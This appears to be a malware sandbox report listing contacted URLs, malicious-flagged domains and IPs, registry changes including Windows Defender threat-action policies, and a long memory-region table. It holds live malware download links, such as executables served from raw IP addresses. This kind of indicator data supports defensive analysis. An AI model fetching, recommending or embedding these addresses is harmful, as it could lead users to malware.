http://80.66.75.114/dl?name=mixninee
unknown
http://www.openssl.org/f
unknown
http://176.113.115.95/thebig/stories.exeC:
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
fivevh5pt.top
84.38.182.221
malicious
iplog.co
188.114.96.3
malicious
ghostreedmnu.shop
188.114.96.3
malicious
ejrsoyz.ua
185.208.158.248
malicious
marafon.in
147.45.60.44
ipinfo.io
34.117.59.81
cdn.discordapp.com
162.159.130.233
api64.ipify.org
173.231.16.77

IPs

IP
Domain
Country
Malicious
84.38.182.221
fivevh5pt.top
Russian Federation
malicious
185.208.158.248
ejrsoyz.ua
Switzerland
malicious
188.114.96.3
iplog.co
European Union
malicious
194.58.114.223
unknown
Russian Federation
80.66.75.114
unknown
Russian Federation
34.117.59.81
ipinfo.io
United States
103.130.147.211
unknown
Turkey
45.91.200.135
unknown
Netherlands
162.159.130.233
cdn.discordapp.com
United States
176.113.115.95
unknown
Russian Federation
173.231.16.77
api64.ipify.org
United States
147.45.60.44
marafon.in
Russian Federation
89.105.201.183
unknown
Netherlands
There are 3 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Inno Setup: Setup Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Inno Setup: App Path
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
InstallLocation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Inno Setup: Icon Group
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Inno Setup: User
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Inno Setup: Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
DisplayName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
UninstallString
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
QuietUninstallString
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
NoModify
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
NoRepair
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
InstallDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\SigmaTuner
edrax_smart_maker_i47_4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7588
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7588
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7588
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7916
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7916
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7916
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8132
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8132
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8132
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7396
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7396
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7396
CreationTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
ProgramId
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
FileId
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
LowerCaseLongPath
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
LongPathHash
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
Name
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
OriginalFileName
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
Publisher
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
Version
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
BinFileVersion
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
BinaryType
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
ProductName
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
ProductVersion
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
LinkDate
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
BinProductVersion
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
AppxPackageFullName
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
AppxPackageRelativeId
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
Size
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
Language
\REGISTRY\A\{806b68f2-7b40-b659-eea9-1ff5a0961f80}\Root\InventoryApplicationFile\tyq3dazbb0crobgk|d801ef8c189c89d4
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147735503
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147814524
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147780199
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147812831
There are 45 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
18DC000
direct allocation
page read and write
malicious
2CA1000
direct allocation
page execute and read and write
malicious
2BF3000
heap
page read and write
malicious
3F8D000
heap
page read and write
malicious
1892000
direct allocation
page read and write
2F01000
heap
page read and write
2F01000
heap
page read and write
31B0000
heap
page read and write
2DCF000
stack
page read and write
2CBD000
stack
page read and write
40D000
unkown
page write copy
4440000
remote allocation
page read and write
27CD000
stack
page read and write
21DD000
stack
page read and write
29F4000
heap
page read and write
401000
unkown
page execute read
183A000
direct allocation
page read and write
2F01000
heap
page read and write
2190000
heap
page read and write
36C7000
heap
page read and write
3CC000
stack
page read and write
21D40000
heap
page read and write
5B0000
heap
page read and write
560000
heap
page read and write
29F4000
heap
page read and write
36B3000
heap
page read and write
305C000
heap
page read and write
29F4000
heap
page read and write
40B000
unkown
page write copy
2F01000
heap
page read and write
3F97000
heap
page read and write
638000
unkown
page readonly
184E000
direct allocation
page read and write
2F01000
heap
page read and write
3F80000
heap
page read and write
352E000
heap
page read and write
427000
unkown
page readonly
3593000
heap
page read and write
3377000
heap
page read and write
2ECE000
stack
page read and write
374E000
stack
page read and write
2028000
direct allocation
page read and write
3373000
heap
page read and write
3641000
heap
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
205E000
heap
page read and write
10ED000
heap
page read and write
9F3000
stack
page read and write
5CF000
stack
page read and write
35FC000
heap
page read and write
9A0000
direct allocation
page read and write
2AA8000
heap
page read and write
29DE000
stack
page read and write
11E5B000
direct allocation
page readonly
3CC000
stack
page read and write
5C0000
heap
page read and write
3685000
heap
page read and write
6EA000
heap
page read and write
2B7E000
stack
page read and write
269E000
heap
page read and write
2F01000
heap
page read and write
990000
heap
page read and write
3210000
heap
page read and write
56A000
heap
page read and write
47D717E000
stack
page read and write
270A000
heap
page read and write
19C000
stack
page read and write
15A6000
trusted library allocation
page read and write
500000
unkown
page readonly
A30000
heap
page read and write
3647000
heap
page read and write
5BBF000
direct allocation
page read and write
29F4000
heap
page read and write
B5D000
stack
page read and write
5890000
heap
page read and write
35F0000
heap
page read and write
14DFF08B000
heap
page read and write
2F01000
heap
page read and write
41B000
unkown
page readonly
464000
heap
page read and write
9F0000
stack
page read and write
5BCB000
direct allocation
page read and write
D5E0000
heap
page read and write
14DFF03A000
heap
page read and write
369D000
heap
page read and write
2F01000
heap
page read and write
305C000
heap
page read and write
37FE000
heap
page read and write
14DFF115000
trusted library allocation
page read and write
17EF000
stack
page read and write
DD0000
heap
page read and write
2F01000
heap
page read and write
362C000
heap
page read and write
2790000
heap
page read and write
2EF0000
heap
page read and write
520000
heap
page read and write
1596000
heap
page read and write
34CD000
heap
page read and write
2F01000
heap
page read and write
29E0000
heap
page read and write
5C54000
direct allocation
page read and write
10C8000
unkown
page read and write
369D000
heap
page read and write
2C23000
heap
page read and write
2F01000
heap
page read and write
5A9000
unkown
page execute and write copy
2B4E000
stack
page read and write
2EB0000
heap
page read and write
290D000
stack
page read and write
9C000
stack
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
2100000
direct allocation
page read and write
400000
unkown
page readonly
500000
unkown
page readonly
20C0000
direct allocation
page execute and read and write
47D6E7D000
stack
page read and write
AE2000
unkown
page readonly
29F4000
heap
page read and write
A11000
unkown
page execute read
8B7000
heap
page read and write
2C42000
heap
page read and write
42DC000
stack
page read and write
21E5D000
stack
page read and write
499000
unkown
page read and write
400000
unkown
page readonly
2940000
heap
page read and write
6A0000
heap
page read and write
27C0000
trusted library allocation
page read and write
2970000
heap
page read and write
2F01000
heap
page read and write
360E000
stack
page read and write
354F000
stack
page read and write
FE8000
unkown
page readonly
2140000
heap
page read and write
2CDC000
stack
page read and write
401000
unkown
page execute read
2C00000
heap
page read and write
2C23000
heap
page read and write
593000
remote allocation
page execute and read and write
352D000
heap
page read and write
2692000
heap
page read and write
2C23000
heap
page read and write
3121000
heap
page read and write
34CE000
stack
page read and write
AE0000
unkown
page readonly
395A000
heap
page read and write
23A0000
direct allocation
page read and write
AB0000
unkown
page readonly
EB2000
unkown
page read and write
77A000
heap
page read and write
36AE000
heap
page read and write
1588000
heap
page read and write
2FCB000
heap
page read and write
329E000
stack
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
2F01000
heap
page read and write
2EB0000
heap
page read and write
F82000
unkown
page write copy
18AA000
direct allocation
page read and write
3040000
heap
page read and write
182C000
direct allocation
page read and write
4E1E000
stack
page read and write
2F01000
heap
page read and write
2F01000
heap
page read and write
2D3E000
heap
page read and write
2D68000
heap
page read and write
21B7F000
stack
page read and write
106E000
heap
page read and write
DF85000
heap
page read and write
26D4000
heap
page read and write
4440000
remote allocation
page read and write
11C1000
heap
page read and write
5D4000
heap
page read and write
6D0000
heap
page read and write
640000
heap
page read and write
117E000
stack
page read and write
29F4000
heap
page read and write
14DFF100000
trusted library allocation
page read and write
25DD000
stack
page read and write
2150000
heap
page read and write
29F4000
heap
page read and write
369D000
heap
page read and write
490000
heap
page read and write
260000
remote allocation
page execute and read and write
14DFF502000
heap
page read and write
14DFF08B000
heap
page read and write
29F4000
heap
page read and write
14DFF07A000
heap
page read and write
2F01000
heap
page read and write
34C0000
heap
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
632000
unkown
page write copy
359E000
stack
page read and write
35D8000
heap
page read and write
19C000
stack
page read and write
2F01000
heap
page read and write
29F4000
heap
page read and write
2150000
heap
page read and write
3520000
heap
page read and write
3670000
heap
page read and write
3379000
heap
page read and write
2490000
direct allocation
page read and write
2B50000
heap
page read and write
2A3F000
stack
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
294D000
stack
page read and write
181A000
direct allocation
page read and write
74B000
heap
page read and write
1CC000
stack
page read and write
40D000
stack
page read and write
2171000
direct allocation
page read and write
29F4000
heap
page read and write
1552000
heap
page read and write
400000
unkown
page readonly
5911000
heap
page read and write
A90000
remote allocation
page read and write
2CCE000
stack
page read and write
D870000
heap
page read and write
3140000
direct allocation
page read and write
450000
heap
page read and write
D5EC000
heap
page read and write
43BC000
stack
page read and write
B9C000
unkown
page read and write
384F000
stack
page read and write
4350000
heap
page read and write
1862000
direct allocation
page read and write
323C000
stack
page read and write
11B5000
heap
page read and write
3683000
heap
page read and write
2C23000
heap
page read and write
4049000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2D31000
heap
page read and write
4D9E000
stack
page read and write
29F4000
heap
page read and write
3AD1000
heap
page read and write
205C000
direct allocation
page read and write
AB1000
unkown
page execute read
2D3E000
heap
page read and write
7E0000
heap
page read and write
305C000
heap
page read and write
104E000
stack
page read and write
1567000
heap
page read and write
3958000
heap
page read and write
1A74000
direct allocation
page read and write
422000
unkown
page write copy
1574000
heap
page read and write
18FC000
direct allocation
page read and write
57D000
heap
page read and write
43C000
unkown
page write copy
2C42000
heap
page read and write
8AD000
stack
page read and write
14DFF000000
unkown
page read and write
62E000
unkown
page readonly
400000
unkown
page readonly
3521000
heap
page read and write
5BA000
remote allocation
page execute and read and write
1020000
heap
page read and write
835000
heap
page read and write
68F000
stack
page read and write
51BD000
stack
page read and write
15CE000
heap
page read and write
37C7000
heap
page read and write
2BF6000
heap
page read and write
5810000
trusted library allocation
page read and write
180C000
direct allocation
page read and write
154C000
heap
page read and write
401000
unkown
page execute and write copy
314D000
stack
page read and write
2B8E000
stack
page read and write
30CD000
heap
page read and write
4021000
trusted library allocation
page read and write
2F01000
heap
page read and write
162E000
stack
page read and write
2C23000
heap
page read and write
492E000
stack
page read and write
5810000
heap
page read and write
400000
unkown
page execute and read and write
2F01000
heap
page read and write
18BE000
direct allocation
page read and write
5C1000
heap
page read and write
E90000
heap
page read and write
B1C000
stack
page read and write
283E000
stack
page read and write
3140000
direct allocation
page read and write
58D000
heap
page read and write
92E000
stack
page read and write
47D747B000
stack
page read and write
310000
heap
page read and write
29F4000
heap
page read and write
347E000
stack
page read and write
29F4000
heap
page read and write
5A3000
unkown
page read and write
305000
heap
page read and write
1591000
heap
page read and write
835000
heap
page read and write
10E0000
heap
page read and write
3670000
heap
page read and write
36A1000
heap
page read and write
10165000
direct allocation
page read and write
221D000
stack
page read and write
D5E7000
heap
page read and write
96000
stack
page read and write
331D000
stack
page read and write
29F4000
heap
page read and write
417F000
stack
page read and write
18BC000
direct allocation
page read and write
2AEF000
stack
page read and write
305C000
heap
page read and write
1A76000
direct allocation
page read and write
2E5E000
stack
page read and write
322F000
stack
page read and write
2F01000
heap
page read and write
3B3E000
stack
page read and write
369D000
heap
page read and write
7D3000
heap
page read and write
CAA000
unkown
page readonly
29F4000
heap
page read and write
740000
direct allocation
page execute and read and write
9A000
stack
page read and write
109E000
stack
page read and write
2C42000
heap
page read and write
10C1000
unkown
page read and write
799000
heap
page read and write
5AF000
unkown
page execute and write copy
29F4000
heap
page read and write
361A000
heap
page read and write
10C6000
unkown
page read and write
29F4000
heap
page read and write
2EF7000
heap
page read and write
29F4000
heap
page read and write
8B0000
heap
page read and write
18CA000
direct allocation
page read and write
793000
heap
page read and write
2F01000
heap
page read and write
14DFF500000
heap
page read and write
3521000
heap
page read and write
2300000
heap
page read and write
43C000
stack
page read and write
4CB000
stack
page read and write
106F000
heap
page read and write
2D8C000
stack
page read and write
5890000
heap
page read and write
218FE000
stack
page read and write
3665000
heap
page read and write
317E000
stack
page read and write
4EDF000
stack
page read and write
29F4000
heap
page read and write
1EE3000
heap
page read and write
62E000
stack
page read and write
101F000
heap
page read and write
1246000
heap
page read and write
2F01000
heap
page read and write
367F000
heap
page read and write
36A3000
heap
page read and write
9B000
stack
page read and write
F84000
unkown
page write copy
5F4000
heap
page read and write
29F4000
heap
page read and write
BE0000
heap
page read and write
3525000
heap
page read and write
11E56000
direct allocation
page read and write
DA7F000
stack
page read and write
2F01000
heap
page read and write
18F6000
direct allocation
page read and write
2BB0000
heap
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
690000
heap
page read and write
3529000
heap
page read and write
550000
heap
page read and write
2D40000
heap
page read and write
29F8000
heap
page read and write
36A2000
heap
page read and write
2D9D000
stack
page read and write
324D000
stack
page read and write
21CFF000
stack
page read and write
283D000
stack
page read and write
2F01000
heap
page read and write
34CA000
heap
page read and write
2F01000
heap
page read and write
11B3000
heap
page read and write
1DFF000
direct allocation
page read and write
19E000
stack
page read and write
26B1000
heap
page read and write
F83000
unkown
page read and write
1942000
direct allocation
page read and write
FDE000
unkown
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
640000
heap
page read and write
1832000
direct allocation
page read and write
501000
unkown
page execute read
500000
heap
page read and write
3FED000
heap
page read and write
1F0000
heap
page read and write
23A1000
heap
page read and write
422000
unkown
page write copy
113C000
heap
page read and write
10018000
direct allocation
page read and write
339F000
stack
page read and write
FE8000
unkown
page readonly
F7D000
unkown
page write copy
29F4000
heap
page read and write
3689000
heap
page read and write
A3E000
stack
page read and write
1806000
direct allocation
page read and write
29F4000
heap
page read and write
14DFF07A000
heap
page read and write
5C1000
heap
page read and write
427000
unkown
page readonly
1043000
heap
page read and write
100D000
stack
page read and write
4ADF000
stack
page read and write
14DFF413000
heap
page read and write
1838000
direct allocation
page read and write
2F01000
heap
page read and write
14DFEF80000
heap
page read and write
29F4000
heap
page read and write
1804000
direct allocation
page read and write
E72000
unkown
page read and write
29F4000
heap
page read and write
13E2000
unkown
page readonly
490000
heap
page read and write
29F4000
heap
page read and write
14DFEFB0000
trusted library allocation
page read and write
1041000
heap
page read and write
1240000
heap
page read and write
144F000
stack
page read and write
237E000
stack
page read and write
36A2000
heap
page read and write
29F4000
heap
page read and write
4FC0000
heap
page read and write
1800000
direct allocation
page read and write
1552000
heap
page read and write
2C23000
heap
page read and write
B85000
heap
page read and write
3623000
heap
page read and write
2F01000
heap
page read and write
368A000
heap
page read and write
6B0000
heap
page read and write
2B61000
heap
page read and write
3FDA000
heap
page read and write
6AB000
heap
page read and write
401000
unkown
page execute read
2A04000
heap
page read and write
55A000
heap
page read and write
2F01000
heap
page read and write
96F000
stack
page read and write
14DFF08B000
heap
page read and write
2D00000
heap
page read and write
770000
heap
page read and write
2BB0000
heap
page read and write
2C0F000
heap
page read and write
430000
heap
page read and write
29F4000
heap
page read and write
370F000
stack
page read and write
828000
heap
page read and write
307E000
stack
page read and write
AB0000
unkown
page readonly
BC0000
heap
page read and write
501000
unkown
page execute read
7D6000
heap
page read and write
15B3000
heap
page read and write
29F4000
heap
page read and write
4E5F000
stack
page read and write
2F01000
heap
page read and write
201C000
direct allocation
page read and write
5E0000
heap
page read and write
14DFF03D000
heap
page read and write
305C000
heap
page read and write
5CAE000
direct allocation
page read and write
DB5000
heap
page read and write
29F4000
heap
page read and write
3200000
heap
page read and write
3FB5000
heap
page read and write
29F4000
heap
page read and write
4C10000
heap
page read and write
337A000
heap
page read and write
29F4000
heap
page read and write
1820000
direct allocation
page read and write
36BC000
heap
page read and write
18F000
stack
page read and write
2F01000
heap
page read and write
295A000
stack
page read and write
2EA0000
heap
page read and write
2CCE000
stack
page read and write
3FA2000
heap
page read and write
329D000
stack
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
2B73000
heap
page read and write
5A20000
direct allocation
page read and write
14DFF02B000
heap
page read and write
2C7F000
stack
page read and write
4AD000
heap
page execute and read and write
29F4000
heap
page read and write
36A4000
heap
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
21A7D000
stack
page read and write
401000
unkown
page execute read
14DFF400000
heap
page read and write
35D000
stack
page read and write
5C0000
heap
page read and write
A90000
remote allocation
page read and write
575000
heap
page read and write
29F4000
heap
page read and write
3410000
heap
page read and write
2C8D000
stack
page read and write
49A000
heap
page read and write
427000
unkown
page readonly
3340000
heap
page read and write
2F01000
heap
page read and write
31DE000
stack
page read and write
34CB000
heap
page read and write
3609000
heap
page read and write
2F01000
heap
page read and write
2F01000
heap
page read and write
10001000
direct allocation
page execute read
3FC9000
heap
page read and write
DE0000
heap
page read and write
13E2000
unkown
page readonly
2A2A000
heap
page read and write
A11000
unkown
page execute read
154F000
stack
page read and write
372D000
heap
page read and write
2E8F000
stack
page read and write
28CE000
stack
page read and write
29F4000
heap
page read and write
4F30000
heap
page read and write
58E000
stack
page read and write
29F4000
heap
page read and write
376A000
heap
page read and write
1040000
heap
page read and write
14DFF402000
heap
page read and write
420000
heap
page read and write
1ED0000
heap
page read and write
303F000
stack
page read and write
472000
unkown
page readonly
1872000
direct allocation
page read and write
29F4000
heap
page read and write
2C42000
heap
page read and write
364F000
heap
page read and write
10F8000
stack
page read and write
3587000
heap
page read and write
7D0000
heap
page read and write
41BF000
stack
page read and write
3600000
heap
page read and write
14DFF513000
heap
page read and write
322F000
stack
page read and write
305D000
heap
page read and write
105D000
stack
page read and write
2F01000
heap
page read and write
E8E000
stack
page read and write
1866000
direct allocation
page read and write
2C41000
heap
page read and write
303E000
stack
page read and write
21D0000
heap
page read and write
198000
stack
page read and write
2C23000
heap
page read and write
305D000
heap
page read and write
3AFD000
stack
page read and write
47D7379000
stack
page read and write
2D5F000
stack
page read and write
2F01000
heap
page read and write
35E0000
heap
page read and write
18EA000
direct allocation
page read and write
2A9F000
stack
page read and write
2F01000
heap
page read and write
2164000
direct allocation
page read and write
181E000
direct allocation
page read and write
2A80000
heap
page read and write
2F01000
heap
page read and write
183F000
direct allocation
page read and write
184C000
direct allocation
page read and write
82B000
heap
page read and write
18A4000
direct allocation
page read and write
319E000
stack
page read and write
D5C000
stack
page read and write
59F000
unkown
page execute and write copy
14DFF08A000
heap
page read and write
1812000
direct allocation
page read and write
2DCB000
stack
page read and write
302B000
heap
page read and write
2703000
heap
page read and write
2380000
heap
page read and write
2600000
heap
page read and write
21BFE000
stack
page read and write
470000
heap
page read and write
20BF000
stack
page read and write
1574000
heap
page read and write
2F01000
heap
page read and write
2D60000
heap
page read and write
3020000
heap
page read and write
3440000
heap
page read and write
29F4000
heap
page read and write
3200000
heap
page read and write
27FE000
unkown
page read and write
A7D000
stack
page read and write
2F01000
heap
page read and write
2FCB000
heap
page read and write
29F4000
heap
page read and write
AB1000
unkown
page execute read
C10000
heap
page read and write
189A000
direct allocation
page read and write
15A4000
trusted library allocation
page read and write
278E000
stack
page read and write
2F8E000
stack
page read and write
29F4000
heap
page read and write
D3D1000
heap
page read and write
3601000
heap
page read and write
77E000
heap
page read and write
1816000
direct allocation
page read and write
E4C000
stack
page read and write
11B4000
heap
page read and write
51A000
heap
page read and write
2F01000
heap
page read and write
2990000
heap
page read and write
2F01000
heap
page read and write
1834000
direct allocation
page read and write
2042000
direct allocation
page read and write
8AC000
heap
page read and write
2F01000
heap
page read and write
BA4000
unkown
page readonly
29F4000
heap
page read and write
3524000
heap
page read and write
1894000
direct allocation
page read and write
1569000
heap
page read and write
4A9E000
stack
page read and write
2C23000
heap
page read and write
14DFF502000
heap
page read and write
2F01000
heap
page read and write
38C000
stack
page read and write
35EA000
heap
page read and write
3377000
heap
page read and write
41B000
unkown
page readonly
3023000
trusted library allocation
page read and write
3601000
heap
page read and write
8FE000
stack
page read and write
25F0000
heap
page read and write
2E3F000
stack
page read and write
3372000
heap
page read and write
27B0000
heap
page read and write
3659000
heap
page read and write
2F01000
heap
page read and write
158D000
heap
page read and write
3021000
trusted library allocation
page execute and read and write
36A3000
heap
page read and write
5890000
heap
page read and write
198E000
direct allocation
page read and write
2F01000
heap
page read and write
40BE000
stack
page read and write
4AB000
unkown
page readonly
290F000
stack
page read and write
1888000
direct allocation
page read and write
113E000
stack
page read and write
2F01000
heap
page read and write
36BF000
heap
page read and write
32A0000
heap
page read and write
6D8000
heap
page read and write
22B000
stack
page read and write
29F4000
heap
page read and write
3663000
heap
page read and write
29F4000
heap
page read and write
10D3000
unkown
page read and write
2F9C000
stack
page read and write
319F000
stack
page read and write
2DCD000
stack
page read and write
2C8D000
stack
page read and write
31E0000
heap
page read and write
5890000
heap
page read and write
420000
unkown
page read and write
29F4000
heap
page read and write
499000
unkown
page write copy
14DFF513000
heap
page read and write
43C000
unkown
page read and write
1376000
heap
page read and write
37FC000
heap
page read and write
111D000
heap
page read and write
2BD000
remote allocation
page readonly
4AB000
unkown
page readonly
317E000
stack
page read and write
315E000
stack
page read and write
BC0000
heap
page read and write
18F8000
direct allocation
page read and write
401000
unkown
page execute read
BA2000
unkown
page execute and read and write
2017000
direct allocation
page read and write
26FB000
heap
page read and write
670000
heap
page read and write
5CA2000
direct allocation
page read and write
2D1D000
heap
page read and write
37FE000
heap
page read and write
1037000
unkown
page read and write
35CF000
stack
page read and write
2BB1000
heap
page read and write
5910000
heap
page read and write
2C23000
heap
page read and write
298D000
stack
page read and write
4CBE000
stack
page read and write
11E5E000
direct allocation
page read and write
2BBB000
heap
page read and write
FE7000
unkown
page write copy
2F01000
heap
page read and write
47EE000
stack
page read and write
835000
heap
page read and write
FE7000
unkown
page write copy
2F01000
heap
page read and write
21C5000
heap
page read and write
188C000
direct allocation
page read and write
29F4000
heap
page read and write
1640000
heap
page read and write
BB0000
heap
page read and write
2160000
heap
page read and write
18B4000
direct allocation
page read and write
3310000
heap
page read and write
2ED0000
heap
page read and write
2F01000
heap
page read and write
2EBB000
heap
page read and write
351E000
stack
page read and write
18A2000
direct allocation
page read and write
3650000
heap
page read and write
510000
heap
page read and write
36C1000
heap
page read and write
3698000
heap
page read and write
F8A000
heap
page read and write
3950000
heap
page read and write
2950000
stack
page read and write
14DFF03C000
heap
page read and write
47D727E000
stack
page read and write
400000
unkown
page readonly
2F9A000
heap
page read and write
366B000
heap
page read and write
5AD000
unkown
page execute and write copy
29F4000
heap
page read and write
2F01000
heap
page read and write
9DA000
stack
page read and write
888000
heap
page read and write
1520000
heap
page read and write
21F0000
heap
page read and write
32E0000
heap
page read and write
16EF000
stack
page read and write
305C000
heap
page read and write
49B0000
heap
page read and write
21A3F000
stack
page read and write
268E000
stack
page read and write
14DFF102000
trusted library allocation
page read and write
305C000
heap
page read and write
1EB000
stack
page read and write
1882000
direct allocation
page read and write
2193E000
stack
page read and write
3350000
heap
page read and write
36B4000
heap
page read and write
118E000
heap
page read and write
2F01000
heap
page read and write
2BF6000
heap
page read and write
21C2000
direct allocation
page read and write
4AB000
stack
page read and write
995000
heap
page read and write
2CDB000
heap
page read and write
3681000
heap
page read and write
21F5F000
stack
page read and write
835000
heap
page read and write
7E0000
heap
page read and write
DB0000
heap
page read and write
1136000
heap
page read and write
1580000
trusted library allocation
page read and write
A10000
unkown
page readonly
2BF6000
heap
page read and write
101C000
heap
page read and write
36A3000
heap
page read and write
2F01000
heap
page read and write
36B9000
heap
page read and write
9D6000
stack
page read and write
185E000
direct allocation
page read and write
630000
heap
page read and write
2DD0000
heap
page read and write
331B000
heap
page read and write
740000
heap
page read and write
31CE000
stack
page read and write
6D0000
heap
page read and write
500000
heap
page read and write
29F4000
heap
page read and write
29F4000
heap
page read and write
510000
heap
page read and write
2A8E000
stack
page read and write
47D6FFA000
stack
page read and write
2160000
direct allocation
page read and write
1210000
heap
page read and write
2D8E000
stack
page read and write
191000
stack
page read and write
430000
heap
page read and write
2AB000
remote allocation
page readonly
3601000
heap
page read and write
5BC9000
direct allocation
page read and write
2C41000
heap
page read and write
28E0000
heap
page read and write
2190000
